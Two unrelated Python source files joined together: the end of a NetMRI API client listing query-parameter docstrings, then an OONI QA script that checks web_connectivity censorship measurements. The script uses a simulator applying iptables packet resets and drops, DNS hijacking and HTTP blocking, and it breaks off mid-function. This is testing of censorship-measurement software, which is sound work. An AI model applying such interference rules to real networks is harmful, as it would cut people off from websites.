:param op_IprFirstSeenTime: The operator to apply to the field IprFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprFirstSeenTime: The timestamp of when NetMRI saw for the first time this flow. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprFirstSeenTime: If op_IprFirstSeenTime is specified, the field named in this input will be compared to the value in IprFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprFirstSeenTime must be specified if op_IprFirstSeenTime is specified.
:type val_f_IprFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprFirstSeenTime: If op_IprFirstSeenTime is specified, this value will be compared to the value in IprFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprFirstSeenTime must be specified if op_IprFirstSeenTime is specified.
:type val_c_IprFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprIPNumericMax: The operator to apply to the field IprIPNumericMax. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprIPNumericMax: The numeric value for the range max value. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprIPNumericMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprIPNumericMax: If op_IprIPNumericMax is specified, the field named in this input will be compared to the value in IprIPNumericMax using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprIPNumericMax must be specified if op_IprIPNumericMax is specified.
:type val_f_IprIPNumericMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprIPNumericMax: If op_IprIPNumericMax is specified, this value will be compared to the value in IprIPNumericMax using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprIPNumericMax must be specified if op_IprIPNumericMax is specified.
:type val_c_IprIPNumericMax: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprIPNumericMin: The operator to apply to the field IprIPNumericMin. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprIPNumericMin: The numeric value for the range min value. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprIPNumericMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprIPNumericMin: If op_IprIPNumericMin is specified, the field named in this input will be compared to the value in IprIPNumericMin using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprIPNumericMin must be specified if op_IprIPNumericMin is specified.
:type val_f_IprIPNumericMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprIPNumericMin: If op_IprIPNumericMin is specified, this value will be compared to the value in IprIPNumericMin using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprIPNumericMin must be specified if op_IprIPNumericMin is specified.
:type val_c_IprIPNumericMin: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprIPVersion: The operator to apply to the field IprIPVersion. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprIPVersion: The ip version for this range. 4 or 6. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprIPVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprIPVersion: If op_IprIPVersion is specified, the field named in this input will be compared to the value in IprIPVersion using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprIPVersion must be specified if op_IprIPVersion is specified.
:type val_f_IprIPVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprIPVersion: If op_IprIPVersion is specified, this value will be compared to the value in IprIPVersion using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprIPVersion must be specified if op_IprIPVersion is specified.
:type val_c_IprIPVersion: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprStartTime: The operator to apply to the field IprStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprStartTime: If op_IprStartTime is specified, the field named in this input will be compared to the value in IprStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprStartTime must be specified if op_IprStartTime is specified.
:type val_f_IprStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprStartTime: If op_IprStartTime is specified, this value will be compared to the value in IprStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprStartTime must be specified if op_IprStartTime is specified.
:type val_c_IprStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprTimestamp: The operator to apply to the field IprTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprTimestamp: If op_IprTimestamp is specified, the field named in this input will be compared to the value in IprTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprTimestamp must be specified if op_IprTimestamp is specified.
:type val_f_IprTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprTimestamp: If op_IprTimestamp is specified, this value will be compared to the value in IprTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprTimestamp must be specified if op_IprTimestamp is specified.
:type val_c_IprTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device ip ranges as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. The requested record will always appear in the returned page, although it may not be the first record. See :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceIPRangeID
:param sort: The data field(s) to use for sorting the output. Default is DeviceIPRangeID. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceIpRange. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if it is not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_ranges: An array of the DeviceIpRange objects that match the specified input criteria.
:rtype device_ip_ranges: Array of DeviceIpRange
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
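The op_/val_f_/val_c_ parameter triplets documented above all follow one pattern: an operator plus exactly one of a constant value or another field name. A minimal sketch of assembling such a triplet into keyword arguments (the helper name and shape are illustrative, not part of this API):

```python
def build_filter(field, op, const=None, other_field=None):
    """Build the op_/val_c_/val_f_ keyword arguments for one field filter.

    Exactly one of const (an explicit constant value) or other_field
    (the name of another field to compare against) must be supplied.
    """
    if (const is None) == (other_field is None):
        raise ValueError("specify exactly one of const or other_field")
    kwargs = {"op_" + field: op}
    if const is not None:
        kwargs["val_c_" + field] = const
    else:
        kwargs["val_f_" + field] = other_field
    return kwargs

# Filter records where IprIPVersion = 4:
build_filter("IprIPVersion", "=", const="4")
# → {'op_IprIPVersion': '=', 'val_c_IprIPVersion': '4'}
```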
def device_object(self, **kwargs):
"""the network object to which belongs this ip address range.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for the IP address range definition.
:type DeviceIPRangeID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The network object to which this IP address range belongs.
:rtype : DeviceObject
"""
return self.api_request(self._get_method_fullname("device_object"), kwargs)
def data_source(self, **kwargs):
"""The collector NetMRI that collected this data record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for the IP address range definition.
:type DeviceIPRangeID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The collector NetMRI that collected this data record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def device(self, **kwargs):
"""The device from which this data was collected.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for the IP address range definition.
:type DeviceIPRangeID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device from which this data was collected.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
] | 18 | 2019-07-22T19:16:16.000Z | 2021-10-09T20:14:12.000Z | #!/usr/bin/env python3
""" ./QA/webconnectivity.py - main QA script for webconnectivity
This script performs a bunch of webconnectivity tests under censored
network conditions and verifies that the measurement is consistent
with the expectations, by parsing the resulting JSONL. """
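The JSONL parsing mentioned above reduces to reading one JSON object per line and extracting its test_keys member; a minimal sketch (the real extraction happens inside the common helpers, not in this file):

```python
import json

def parse_test_keys(lines):
    # One measurement per line; skip blank lines, return each "test_keys" dict.
    return [json.loads(line)["test_keys"] for line in lines if line.strip()]

parse_test_keys(['{"test_keys": {"blocking": false, "accessible": true}}'])
# → [{'blocking': False, 'accessible': True}]
```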
import contextlib
import json
import os
import shlex
import socket
import subprocess
import sys
import time
import urllib.parse
sys.path.insert(0, ".")
import common
def execute_jafar_and_return_validated_test_keys(
ooni_exe, outfile, experiment_args, tag, args
):
""" Executes jafar and returns the validated parsed test keys, or throws
an AssertionError if the result is not valid. """
tk = common.execute_jafar_and_miniooni(
ooni_exe, outfile, experiment_args, tag, args
)
return tk
def assert_status_flags_are(ooni_exe, tk, desired):
""" Checks whether the status flags are what we expect them to
be when we're running miniooni. This check only makes sense
with miniooni b/c status flags are a miniooni extension. """
if "miniooni" not in ooni_exe:
return
assert tk["x_status"] == desired
def webconnectivity_https_ok_with_control_failure(ooni_exe, outfile):
""" Successful HTTPS measurement but control failure. """
args = [
"-iptables-reset-keyword",
"wcth.ooni.io",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.com/ web_connectivity",
"webconnectivity_https_ok_with_control_failure",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == None
assert tk["control_failure"] == "connection_reset"
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
if "miniooni" in ooni_exe:
assert tk["blocking"] == False
assert tk["accessible"] == True
else:
assert tk["blocking"] == None
assert tk["accessible"] == None
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_http_ok_with_control_failure(ooni_exe, outfile):
""" Successful HTTP measurement but control failure. """
args = [
"-iptables-reset-keyword",
"wcth.ooni.io",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_ok_with_control_failure",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == None
assert tk["control_failure"] == "connection_reset"
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == None
assert tk["accessible"] == None
assert_status_flags_are(ooni_exe, tk, 8)
def webconnectivity_transparent_http_proxy(ooni_exe, outfile):
""" Test case where we pass through a transparent HTTP proxy """
args = []
args.append("-iptables-hijack-https-to")
args.append("127.0.0.1:443")
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.org web_connectivity",
"webconnectivity_transparent_http_proxy",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == True
assert tk["body_proportion"] == 1
assert tk["status_code_match"] == True
assert tk["headers_match"] == True
assert tk["title_match"] == True
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_dns_hijacking(ooni_exe, outfile):
""" Test case where there is DNS hijacking towards a transparent proxy. """
args = []
args.append("-iptables-hijack-dns-to")
args.append("127.0.0.1:53")
args.append("-dns-proxy-hijack")
args.append("example.org")
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.org web_connectivity",
"webconnectivity_dns_hijacking",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == True
assert tk["body_proportion"] == 1
assert tk["status_code_match"] == True
assert tk["headers_match"] == True
assert tk["title_match"] == True
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_control_unreachable_and_using_http(ooni_exe, outfile):
""" Test case where the control is unreachable and we're using the
plaintext HTTP protocol rather than HTTPS """
args = []
args.append("-iptables-reset-keyword")
args.append("wcth.ooni.io")
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org web_connectivity",
"webconnectivity_control_unreachable_and_using_http",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == None
assert tk["control_failure"] == "connection_reset"
assert tk["http_experiment_failure"] == None
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == None
assert tk["accessible"] == None
assert_status_flags_are(ooni_exe, tk, 8)
def webconnectivity_nonexistent_domain(ooni_exe, outfile):
""" Test case where the domain does not exist """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://antani.ooni.io web_connectivity",
"webconnectivity_nonexistent_domain",
args,
)
# TODO(bassosimone): Debatable result. We need to do better here.
# See <https://github.com/ooni/probe-engine/issues/579>.
#
# Note that MK is not doing it right here because it's suppressing the
# dns_nxdomain_error that instead is very informative. Yet, it is reporting
# a failure in HTTP, which miniooni does not because it does not make
# sense to perform HTTP when there are no IP addresses.
#
# The following seems indeed a bug in MK where we don't properly record the
# actual error that occurred when performing the DNS experiment.
#
# See <https://github.com/measurement-kit/measurement-kit/issues/1931>.
if "miniooni" in ooni_exe:
assert tk["dns_experiment_failure"] == "dns_nxdomain_error"
else:
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == None
else:
assert tk["http_experiment_failure"] == "dns_lookup_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == False
assert tk["accessible"] == True
assert_status_flags_are(ooni_exe, tk, 2052)
def webconnectivity_tcpip_blocking_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's TCP/IP blocking w/ consistent DNS """
ip = socket.gethostbyname("nexa.polito.it")
args = [
"-iptables-drop-ip",
ip,
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://nexa.polito.it web_connectivity",
"webconnectivity_tcpip_blocking_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "generic_timeout_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "tcp_ip"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 4224)
def webconnectivity_tcpip_blocking_with_inconsistent_dns(ooni_exe, outfile):
""" Test case where there's TCP/IP blocking w/ inconsistent DNS """
def runner(port):
args = [
"-dns-proxy-hijack",
"nexa.polito.it",
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-iptables-hijack-http-to",
"127.0.0.1:{}".format(port),
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://nexa.polito.it web_connectivity",
"webconnectivity_tcpip_blocking_with_inconsistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "connection_refused"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 4256)
common.with_free_port(runner)
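with_free_port is defined in the common helper module (not shown here). A plausible sketch of what it does, assuming the usual ask-the-OS-for-port-0 trick:

```python
import socket

def with_free_port(func):
    # Bind port 0 so the OS assigns a free TCP port, then hand it to func.
    # (Sketch only; the real helper lives in ./QA/common.py.)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind(("127.0.0.1", 0))
        port = sock.getsockname()[1]
    func(port)
```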
def webconnectivity_http_connection_refused_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's TCP/IP blocking w/ consistent DNS that occurs
while we're following the chain of redirects. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the IP address
# used by nexa.polito.it. So the error should happen in the redirect chain.
ip = socket.gethostbyname("nexa.polito.it")
args = [
"-iptables-reset-ip",
ip,
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_connection_refused_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "connection_refused"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "http-failure"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8320)
def webconnectivity_http_connection_reset_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's RST-based blocking blocking w/ consistent DNS that
occurs while we're following the chain of redirects. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the Host header
# used for nexa.polito.it. So the error should happen in the redirect chain.
args = [
"-iptables-reset-keyword",
"Host: nexa",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_connection_reset_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "connection_reset"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "http-failure"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8448)
def webconnectivity_http_nxdomain_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's a redirection and the redirected request cannot
continue because a NXDOMAIN error occurs. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the DNS request
# for nexa.polito.it. So the error should happen in the redirect chain.
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-block",
"nexa.polito.it",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_nxdomain_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert (
tk["http_experiment_failure"] == "dns_nxdomain_error" # miniooni
or tk["http_experiment_failure"] == "dns_lookup_error" # MK
)
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8224)
def webconnectivity_http_eof_error_with_consistent_dns(ooni_exe, outfile):
""" Test case where there's a redirection and the redirected request cannot
continue because an eof_error error occurs. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the HTTP request
# for nexa.polito.it using the cleartext bad proxy. So the error should happen in
# the redirect chain and should be EOF.
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"nexa.polito.it",
"-iptables-hijack-http-to",
"127.0.0.1:7117", # this is badproxy's cleartext endpoint
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity", # bit.ly uses https
"webconnectivity_http_eof_error_with_consistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "consistent"
assert tk["control_failure"] == None
assert tk["http_experiment_failure"] == "eof_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "http-failure"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 8448)
def webconnectivity_http_generic_timeout_error_with_consistent_dns(ooni_exe, outfile):
    """ Test case where there's a redirection and the redirected request cannot
    continue because a generic_timeout_error occurs. """
# We use a bit.ly link redirecting to nexa.polito.it. We block the HTTP request
# for nexa.polito.it by dropping packets using DPI. So the error should happen in
# the redirect chain and should be timeout.
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"nexa.polito.it",
"-iptables-drop-keyword",
"Host: nexa",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://bit.ly/3h9EJR3 web_connectivity",
"webconnectivity_http_generic_timeout_error_with_consistent_dns",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    assert tk["http_experiment_failure"] == "generic_timeout_error"
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    assert tk["blocking"] == "http-failure"
    assert tk["accessible"] is False
assert_status_flags_are(ooni_exe, tk, 8704)
def webconnectivity_http_connection_reset_with_inconsistent_dns(ooni_exe, outfile):
    """ Test case where there's inconsistent DNS and the connection is
    reset (RST) while we're executing HTTP code. """
args = [
"-iptables-reset-keyword",
"nexa.polito.it",
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"polito",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://nexa.polito.it/ web_connectivity",
"webconnectivity_http_connection_reset_with_inconsistent_dns",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "inconsistent"
    assert tk["control_failure"] is None
    assert tk["http_experiment_failure"] == "connection_reset"
    assert tk["body_length_match"] is None
    assert tk["body_proportion"] == 0
    assert tk["status_code_match"] is None
    assert tk["headers_match"] is None
    assert tk["title_match"] is None
    assert tk["blocking"] == "dns"
    assert tk["accessible"] is False
assert_status_flags_are(ooni_exe, tk, 8480)
def webconnectivity_http_successful_website(ooni_exe, outfile):
""" Test case where we succeed with an HTTP only webpage """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_successful_website",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    assert tk["http_experiment_failure"] is None
    assert tk["body_length_match"] is True
    assert tk["body_proportion"] == 1
    assert tk["status_code_match"] is True
    assert tk["headers_match"] is True
    assert tk["title_match"] is True
    assert tk["blocking"] is False
    assert tk["accessible"] is True
assert_status_flags_are(ooni_exe, tk, 2)
def webconnectivity_https_successful_website(ooni_exe, outfile):
""" Test case where we succeed with an HTTPS only webpage """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.com/ web_connectivity",
"webconnectivity_https_successful_website",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    assert tk["http_experiment_failure"] is None
    assert tk["body_length_match"] is True
    assert tk["body_proportion"] == 1
    assert tk["status_code_match"] is True
    assert tk["headers_match"] is True
    assert tk["title_match"] is True
    assert tk["blocking"] is False
    assert tk["accessible"] is True
assert_status_flags_are(ooni_exe, tk, 1)
def webconnectivity_http_diff_with_inconsistent_dns(ooni_exe, outfile):
""" Test case where we get an http-diff and the DNS is inconsistent """
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"example.org",
"-http-proxy-block",
"example.org",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_diff_with_inconsistent_dns",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "inconsistent"
    assert tk["control_failure"] is None
    assert tk["http_experiment_failure"] is None
    assert tk["body_length_match"] is False
    assert tk["body_proportion"] < 1
    assert tk["status_code_match"] is False
    assert tk["headers_match"] is False
    assert tk["title_match"] is False
    assert tk["blocking"] == "dns"
    assert tk["accessible"] is False
assert_status_flags_are(ooni_exe, tk, 96)
def webconnectivity_http_diff_with_consistent_dns(ooni_exe, outfile):
""" Test case where we get an http-diff and the DNS is consistent """
args = [
"-iptables-hijack-http-to",
"127.0.0.1:80",
"-http-proxy-block",
"example.org",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i http://example.org/ web_connectivity",
"webconnectivity_http_diff_with_consistent_dns",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    assert tk["http_experiment_failure"] is None
    assert tk["body_length_match"] is False
    assert tk["body_proportion"] < 1
    assert tk["status_code_match"] is False
    assert tk["headers_match"] is False
    assert tk["title_match"] is False
    assert tk["blocking"] == "http-diff"
    assert tk["accessible"] is False
assert_status_flags_are(ooni_exe, tk, 64)
def webconnectivity_https_expired_certificate(ooni_exe, outfile):
""" Test case where the domain's certificate is expired """
args = []
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://expired.badssl.com/ web_connectivity",
"webconnectivity_https_expired_certificate",
args,
)
    assert tk["dns_experiment_failure"] is None
    assert tk["dns_consistency"] == "consistent"
    assert tk["control_failure"] is None
    if "miniooni" in ooni_exe:
        assert tk["http_experiment_failure"] == "ssl_invalid_certificate"
    else:
